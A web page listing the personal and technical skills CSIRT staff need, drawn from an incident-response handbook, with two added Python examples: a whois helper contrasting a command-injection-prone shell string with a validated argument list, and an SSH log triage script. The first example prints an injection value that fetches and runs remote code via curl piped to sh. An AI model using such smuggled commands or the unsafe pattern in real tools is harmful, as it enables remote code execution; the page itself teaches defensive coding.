Basic skills
What Skills Are Needed When Staffing Your CSIRT?
Handbook for Computer Security Incident Response Teams, pages 23-35
The set of basic skills CSIRT staff members need to have is separated into two broad groups: personal skills and technical skills.
Personal
- Communication
- Presentation Skills
- Diplomacy
- Ability to Follow Policies and Procedures
- Team Skills
- Integrity
- Knowing One's Limits
- Coping with Stress
- Problem Solving
- Time Management
Communication
CSIRT staff members need to be effective communicators to ensure that they obtain and supply the information necessary to be helpful. They need to be good listeners, understanding what is said (or not said) to enable them to gain details about an incident that is being reported. CSIRT staff must also remain in control of these communications to most effectively determine what is happening, what facts are important, and what assistance is necessary. They need to be able to adapt to the appropriate level of discussion without being condescending or talking above the comprehension level of the listener.
Written Communication
For many CSIRTs, a large part of their communication occurs through the written word. This communication can take many forms, including:
- responses in email concerning incidents
- documentation of event or incident reports, vulnerabilities, and other technical information
- notifications and/or guidelines that are provided to the constituency
- internal development of CSIRT policies and procedures
- other external communications to staff, management, or other relevant parties
Oral Communication
Oral communication often occurs through telephone exchanges or face-to-face discussions and can involve a variety of individuals (system and network administrators or other IT staff, management or other administrative staff, press/media/public relations staff, vendors, etc.).
In some cases, selected members of the team may be primary contacts with the above groups and/or serve the role of "official spokesperson" for the CSIRT, presenting the mission and goals of the CSIRT, and speaking authoritatively about the services and activities undertaken by the team.
Presentation Skills
Although all CSIRT incident handling staff may interact daily with members of the constituency, they may not all be comfortable in front of a large audience or an audience of their peers. Moreover, staff may find themselves facing difficult, controversial, or potentially hostile situations that must be handled in a professional way; they need to be adept at effectively responding without harming the reputation of the CSIRT or offending others. Gaining confidence in presentation skills will take time and effort for staff members to become more experienced and comfortable in these situations.
Diplomacy
CSIRT staff members often find that the community with whom they interact may have a variety of goals and needs. This community may have varying levels of knowledge and degrees of excitement; some people may feel overwhelmed with the gravity of their situation; they may be anxious, frustrated, or angry. Still others may be aggressive or try to "trick" the CSIRT staff member into providing inappropriate information. Skilled CSIRT staff will be able to anticipate potential points of contention, be able to respond appropriately, maintain good relations, and avoid offending others. They also will understand that they are representing the CSIRT and/or their organization. Diplomacy and tact are essential.
Ability to Follow Policies and Procedures
CSIRT staff should understand how and why the policies and procedures came into existence. To ensure a consistent and reliable incident response service, CSIRT staff must be prepared to accept and follow the rules and guidelines, even if these are not fully documented and regardless of whether the staff member personally agrees with them.
On the other hand, if the staff feel strongly that change is required and if they want to approach management with suggested changes, they should be permitted to propose changes.
Team Skills
CSIRT staff must be able to work in a team environment.
They must be flexible and willing to adapt to change.
They also need team skills for interacting with other parties (for example, members of other incident response teams and other members of the organization, such as IT staff, site security officers, and network operators).
An effective combination of technical ability and management/leadership skills is not easy to find. An individual can gain these skills over time, and some individuals may evolve into a leadership role as they gain experience and training.
But it is important to recognize that technical leadership is not a skill that is suddenly available on demand after an individual has taken a leadership training class.
Integrity
The nature of CSIRT work means that the team members often deal with information that is sensitive and, occasionally, they might have access to information that is newsworthy. CSIRT staff must be trustworthy, discreet, and able to handle information in confidence.
CSIRT staff may find themselves in a position where they know about information and could comment on a topic, but doing so could acknowledge or disclose information that was provided in confidence or that could affect an ongoing investigation.
Knowing One's Limits
Another important ability that CSIRT staff must have is to be able to readily admit when they have reached the limit of their own knowledge or expertise in a given area. However difficult it is to admit a limitation, individuals must recognize their limitations and actively seek support from their team members, other experts, or their management. Otherwise, the reputation of a team can be severely affected by a CSIRT staff member who has provided incorrect information or guidance to others.
Coping with Stress
CSIRT staff often find themselves in stressful situations. They need to be able to recognize when they are becoming stressed, be willing to make their fellow team members aware of the situation, and take (or seek help with) the necessary steps to control and maintain their composure. In particular, they need the ability to remain calm in tense situations—ranging from an excessive workload to an aggressive caller to an incident where human life or a critical infrastructure may be at risk. The team's reputation, and the individual's personal reputation, will be enhanced or will suffer depending on how such situations are handled.
Problem Solving
Without good problem-solving skills, staff members could become overwhelmed with the volumes of data related to incidents and other tasks that need to be handled. Problem-solving skills also include an ability for the CSIRT staff member to "think outside the box" or look at issues from multiple perspectives to identify relevant information or data.
Time Management
CSIRT staff will be confronted with a multitude of tasks ranging from analyzing, coordinating, and responding to incidents, to performing duties such as prioritizing their workload, attending and/or preparing for meetings, completing time sheets, collecting statistics, conducting research, giving briefings and presentations, traveling to conferences, and possibly providing onsite technical support.
Sometimes, even when they are given criteria for prioritizing tasks, staff may find it difficult to appropriately prioritize and manage the myriad responsibilities that they are assigned in accordance with those criteria.
Technical
The basic technical skills that CSIRT staff need have been separated into two categories: technical foundation skills and incident handling skills.
Technical foundation skills require a basic understanding of the underlying technologies used by the CSIRT and the constituency, as well as an understanding of issues that affect that team or constituency.
Incident handling skills require an understanding of the techniques, decision points, and supporting tools (software or applications) required in the daily performance of CSIRT activities.
Technical Foundation
- Security Principles
- Security Vulnerabilities/Weaknesses
- Risks
- The Internet
- Network Protocols
- Network Applications and Services
- Network Security Issues
- Host/System Security Issues
- Malicious Code (Viruses, Worms, Trojan Horse programs)
- Programming Skills
Incident Handling Skills
- Local Team Policies and Procedures
- Understanding/Identifying Intruder Techniques
- Communicating with Sites
- Incident Analysis
- Maintenance of Incident Records
Security Principles
- confidentiality
- availability
- authentication
- integrity
- access control
- privacy
- non-repudiation
Security Vulnerabilities/Weaknesses
- physical security issues
- protocol design flaws (e.g., man-in-the-middle attacks, spoofing)
- malicious code (e.g., viruses, worms, Trojan horses)
- implementation flaws (e.g., buffer overflow, timing windows/race conditions)
- configuration weaknesses
- user errors or indifference
Risks
CSIRT staff members need to have a basic understanding of computer security risk analysis. They should understand the effects on their constituency of various types of risks (such as potentially widespread Internet attacks, national security issues as they relate to their team and constituency, physical threats, financial threats, loss of business, reputation, or customer confidence, and damage or loss of data). Newly hired CSIRT staff may not have this knowledge and will need guidance and mentoring to ensure they understand the risks that may affect the constituency being served, as well as any risks that might affect the CSIRT itself.
The Internet
At a minimum, CSIRT staff members should know about the history, philosophy, and structure of the Internet, and the infrastructures that support it.
Without this fundamental background information, they will struggle or fail to understand other technical issues, such as the lack of security in underlying protocols and services used on the Internet or to anticipate the threats that might occur in the future.
Network Protocols
Members of the CSIRT staff need to have a basic understanding of the common (or core) network protocols that are used by the team and the constituency they serve. For each protocol, they should have a basic understanding of the protocol, its specification, and how it is used. In addition, they should understand the common types of threats or attacks against the protocol, as well as strategies to mitigate or eliminate such attacks.
Network Applications and Services
CSIRT staff members need a basic understanding of the common network applications and services that the team and the constituency use (DNS, NFS, SSH, etc.). For each application or service, they should understand the purpose of the application or service, how it works, its common usages, secure configurations, and the common types of threats or attacks against the application or service, as well as mitigation strategies.
Network Security Issues
CSIRT staff members should have a basic understanding of the concepts of network security and be able to recognize vulnerable points in network configurations. They should understand the concepts and basic perimeter security of network firewalls (design, packet filtering, proxy systems, DMZ, bastion hosts, etc.), router security, potential for information disclosure of data traveling across the network (e.g., packet monitoring or "sniffers"), or threats relating to accepting untrustworthy information.
Host/System Security Issues
CSIRT staff need to understand security issues at a host level for the various types of operating systems (UNIX, Windows, or any other operating systems used by the team or constituency). Before understanding the security aspects, the CSIRT staff member must first have:
- experience using the operating system (user security issues)
- some familiarity with managing and maintaining the operating system (as an administrator)
For each operating system, the CSIRT staff member needs to know how to
- configure (harden) the system securely
- review configuration files for security weaknesses
- identify common attack methods
- determine if a compromise attempt occurred
- determine if an attempted system compromise was successful
- review log files for anomalies
- analyze the results of attacks
- manage system privileges
- secure network daemons
- recover from a compromise
Malicious Code (Viruses, Worms, Trojan Horse programs)
CSIRT staff must understand the different types of malicious code attacks that occur and how these can affect their constituency (system compromises, denial of service, loss of data integrity, etc.). Malicious code can have different types of payloads that can cause a denial of service attack or web defacement, or the code can contain more "dynamic" payloads that can be configured to result in multi-faceted attack vectors.
Staff should understand not only how malicious code is propagated through some of the obvious methods (disks, email, programs, etc.) but also how it can propagate through other means such as PostScript, Word macros, MIME, peer-to-peer file sharing, or boot-sector viruses that affect operating systems running on PC and Macintosh platforms. CSIRT staff must be aware of how such attacks occur and are propagated, the risks and damage associated with such attacks, prevention and mitigation strategies, detection and removal processes, and recovery techniques.
Programming Skills
Team members need to have system and network programming experience. The team should ensure that a range of programming languages is covered on the operating systems that the team and the constituency use.
These scripts or programming tools can be used to assist in the analysis and handling of incident information (e.g., writing different scripts for counting and sorting through various logs, searching databases, looking up information, extracting information from logs/files, collecting and merging data).
Additionally, CSIRT staff should understand the concepts of and techniques for secure programming. They need to be aware of how vulnerabilities can be introduced into code (e.g., through poor programming and design practices) and how to avoid these in any tools or products that they may develop for the team or their constituency.
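As an added example of the last point (not code from the handbook or from this page): a hypothetical CSIRT helper that looks up an IP address taken from an incident report by running the system whois client, shown first in the form that introduces a command-injection flaw and then in the hardened form. The scenario, the function names and the malicious report value are assumptions made for illustration.

```python
"""Added example (not code from the CSIRT handbook). Scenario, hypothetical: a CSIRT
helper that looks up the registrant of an IP address taken from an incident report by
running the system `whois` client. The report is attacker-influenced data, so the
address must be treated as untrusted input."""
import ipaddress
import subprocess
from typing import List


def build_lookup_unsafe(reported_ip: str) -> str:
    # VULNERABLE: the reported value is pasted into a shell command line unchanged.
    # A caller that does subprocess.run(cmd, shell=True) on the result would execute
    # "curl ... | sh" from a report value like
    # "198.51.100.23; curl http://203.0.113.5/x | sh" with the handler's privileges.
    return f"whois {reported_ip}"


def build_lookup_safe(reported_ip: str) -> List[str]:
    # HARDENED: (1) validate that the value is syntactically an IPv4/IPv6 address,
    # rejecting anything else with ValueError, and (2) build an argv list so that no
    # shell ever parses it. A validated address cannot begin with "-", so it also
    # cannot be misread by the whois client as an option.
    ip = ipaddress.ip_address(reported_ip.strip())
    return ["whois", str(ip)]


def is_safe_target(reported_ip: str) -> bool:
    # Yes/no form of the same validation for callers that prefer not to catch.
    try:
        build_lookup_safe(reported_ip)
        return True
    except ValueError:
        return False


def run_lookup(reported_ip: str, timeout: float = 20.0) -> str:
    # Runs the hardened form: no shell, bounded runtime, output captured so it can go
    # into the incident record. Needs a whois client and network access, so it is
    # only called by a human operator, not by the offline checks.
    argv = build_lookup_safe(reported_ip)
    proc = subprocess.run(argv, capture_output=True, text=True,
                          timeout=timeout, check=False)
    return proc.stdout


if __name__ == "__main__":
    payload = "198.51.100.23; curl http://203.0.113.5/x | sh"  # constructed malicious report value
    print("unsafe command line:", build_lookup_unsafe(payload))
    print("safe handling of payload:", "rejected" if not is_safe_target(payload) else "accepted")
    print("safe argv for a real address:", build_lookup_safe(" 198.51.100.23 "))
```

The same pattern applies to any value lifted from an incident report (hostnames, file names, URLs, user names): validate against the narrowest grammar the tool actually needs, and hand the value to the operating system as a separate argument rather than through a shell string.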
Incident Handling Skills
Within the broad range of technical skills needed to undertake incident handling is a subset of skills the CSIRT staff also need. We call these "incident handling" skills, and they are associated with the underlying daily operational activities of the CSIRT.
It is worth noting that while these underlying concepts relating to incident handling skills can be similar across many different CSIRTs, the specific implementation, policies, and procedures for how these concepts are applied will be very specific within each team (and based on other factors mentioned previously in the Introduction).
Local Team Policies and Procedures
The CSIRT incident handlers must be trained in the local policies and procedures that govern the operation of their team. Every aspect of the work will most likely lead back to a policy or procedure that must be followed or to other directives from management. CSIRT staff need this background information and must have a firm grasp of the guiding principles; otherwise, they won't understand the framework and boundaries in which they apply their range of skills and knowledge. Every CSIRT staff member must be able to support these policies and procedures, not only at the team level but also at an organizational level (or even any that are associated with the constituency they serve as it applies to their relationship with that constituency).
Understanding/Identifying Intruder Techniques
CSIRT incident handlers must be able to recognize known intrusion techniques based on the footprints or artifacts left by different types of attack in the incident reports they handle.
Given real incident data, the incident handler should be able to use the knowledge that they have gathered from any existing documented analyses to identify the types of attack and recognize specific intruder tools or toolkits, techniques used, or other malicious code. With each type of attack, they should understand the associated risks and effects, the relative severity, and the mitigation, prevention, or recovery methods.
Another important incident handling skill is the analysis of and correlation between incidents to notice what has not been seen before (a new attack technique, footprint, intruder tool, attack vector). Being able to identify such abnormal (or unexpected) activity might lead to the recognition of new attacks or potential vulnerabilities that warrant further investigation or analysis (which might be undertaken by more senior members of the team or other experts).
Some team members will require additional specialist skills and knowledge to be able to:
- identify a new vulnerability
- undertake technical analysis of intruder tools and techniques
- recognize new intrusion techniques based on the footprints and their effects
- document analyses of artifacts as reference material for other team members (this work might also extend to providing guidance to help other CSIRT staff identify footprints, associated risks, and prevention methods)
Communicating with Sites
Much of the communication undertaken by CSIRT incident handlers is conducted online, commonly through email. The correspondence often requires the transmittal of incident data in a secure manner. As a result, it is crucial that CSIRT staff be fully conversant in the use of email and MIME functionality, as well as tools and methods to identify contact information for other sites (including understanding which points of contact are most appropriate) and the appropriate encryption technologies to be used.
Incident Analysis
- Who is involved?
- What has happened?
- Where did the attack originate from?
- When (what time frame)?
- Why did it happen?
- How was the system vulnerable or how did the attack occur?
- What was the reason for the attack?
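Several of the skills listed on this page come together in one small script: reviewing log files for anomalies and determining whether a compromise attempt occurred and whether it succeeded (Host/System Security Issues), writing scripts that count and sort through logs (Programming Skills), and answering the who, what, where and when questions above (Incident Analysis). The following is an added example, not code from the handbook or from this page; the log excerpt, the host name "bastion" and the addresses are constructed for illustration, and the failure threshold and time window are assumptions.

```python
"""Added example (not code from the CSIRT handbook). A small triage script of the kind
the Programming Skills section describes: it parses a syslog excerpt, counts and sorts
failed logins per source address, decides whether a compromise attempt occurred and
whether it succeeded, and summarizes who / what / where / when for the incident record.
The log lines are constructed for illustration and mimic OpenSSH sshd messages on a
hypothetical host named "bastion"."""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log (not real data): a password-guessing burst that ends in an
# accepted login, an unrelated cron line, a normal key login, and a single failure.
SAMPLE_LOG = """\
Mar  4 02:14:01 bastion sshd[2201]: Failed password for invalid user admin from 198.51.100.23 port 51022 ssh2
Mar  4 02:14:03 bastion sshd[2203]: Failed password for root from 198.51.100.23 port 51024 ssh2
Mar  4 02:14:05 bastion sshd[2205]: Failed password for root from 198.51.100.23 port 51026 ssh2
Mar  4 02:14:08 bastion sshd[2207]: Failed password for root from 198.51.100.23 port 51028 ssh2
Mar  4 02:14:11 bastion sshd[2209]: Failed password for root from 198.51.100.23 port 51030 ssh2
Mar  4 02:14:15 bastion sshd[2211]: Accepted password for root from 198.51.100.23 port 51032 ssh2
Mar  4 02:14:16 bastion CRON[2215]: (root) CMD (run-parts /etc/cron.hourly)
Mar  4 02:20:40 bastion sshd[2290]: Accepted publickey for alice from 203.0.113.7 port 40110 ssh2
Mar  4 02:31:12 bastion sshd[2301]: Failed password for bob from 203.0.113.9 port 40201 ssh2
"""

# Matches sshd authentication lines only; every other syslog line is ignored.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[0-9a-fA-F.:]+) port \d+"
)


def parse(log_text, year=2024):
    """Turn log lines into event dicts. Syslog carries no year, so one is supplied."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append({"ts": ts, "host": m["host"], "result": m["result"],
                       "method": m["method"], "user": m["user"], "ip": m["ip"]})
    return events


def failures_per_ip(events):
    """Count failed logins per source address, most active first (ties by address)."""
    counts = defaultdict(int)
    for e in events:
        if e["result"] == "Failed":
            counts[e["ip"]] += 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


def brute_force_findings(events, threshold=5, window_seconds=300):
    """A source with >= threshold failures inside the window is a compromise attempt;
    an Accepted login from the same source at or after the end of that burst means
    the attempt most likely succeeded. Threshold and window are assumed tuning values."""
    by_ip = defaultdict(list)
    for e in events:
        by_ip[e["ip"]].append(e)
    findings = []
    for ip, evs in sorted(by_ip.items()):
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["result"] == "Failed"]
        burst = None
        for i in range(len(failures) - threshold + 1):  # sliding window over failures
            j = i + threshold - 1
            if (failures[j]["ts"] - failures[i]["ts"]).total_seconds() <= window_seconds:
                burst = (failures[i], failures[j])
                break
        if burst is None:
            continue
        later_success = [e for e in evs
                         if e["result"] == "Accepted" and e["ts"] >= burst[1]["ts"]]
        findings.append({
            "where": ip,  # source of the attack
            "what": "brute-force login" + (", succeeded" if later_success else ", no success seen"),
            "who": later_success[0]["user"] if later_success else None,  # account compromised
            "targets": sorted({e["user"] for e in failures}),  # accounts tried
            "failures": len(failures),
            "when": (burst[0]["ts"], (later_success[0] if later_success else burst[1])["ts"]),
            "host": evs[0]["host"],
        })
    return findings


if __name__ == "__main__":
    evs = parse(SAMPLE_LOG)
    for ip, n in failures_per_ip(evs):
        print(f"{n:4d} failed logins from {ip}")
    for f in brute_force_findings(evs):
        start, end = f["when"]
        print(f"{f['host']}: {f['what']} from {f['where']} between {start:%H:%M:%S} and "
              f"{end:%H:%M:%S}; account {f['who']!r}, tried {f['targets']}")
```

The script deliberately stops short of "why": the log shows that five password failures from 198.51.100.23 were followed by an accepted root login within fourteen seconds, which is enough to open an incident, but the reason for the attack and the attacker's identity are questions the handler takes to other sources.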
Maintenance of Incident Records
Maintaining incident records is an important process that should be integrated into the CSIRT operations and followed by all team members who are responsible for incident handling functions.
It is also very important that incident records are well documented, consistently maintained, and current. Doing so will give a clear picture of the current state of activity and what work remains.
Continuing Education
Financial plans and budgets should include funds for sustaining the overall quality of the CSIRT. To enable CSIRT staff to keep pace with the changes in technology and usage, there should be an ongoing budgeting plan for continuing education or refresher courses so CSIRT staff can continue to be effective incident handlers. In addition, where appropriate, budget plans should also include funds to provide opportunities for professional development to further enhance the team members' knowledge and abilities, keep them engaged and energized about CSIRT work, and (at the same time) expand the overall capabilities of the team.
Raising the Bar
Just as CSIRTs evolve and need to adapt to change, we expect that over time a list such as this one will need to be revised as the "bar" is raised.
By Hillar Aarelaid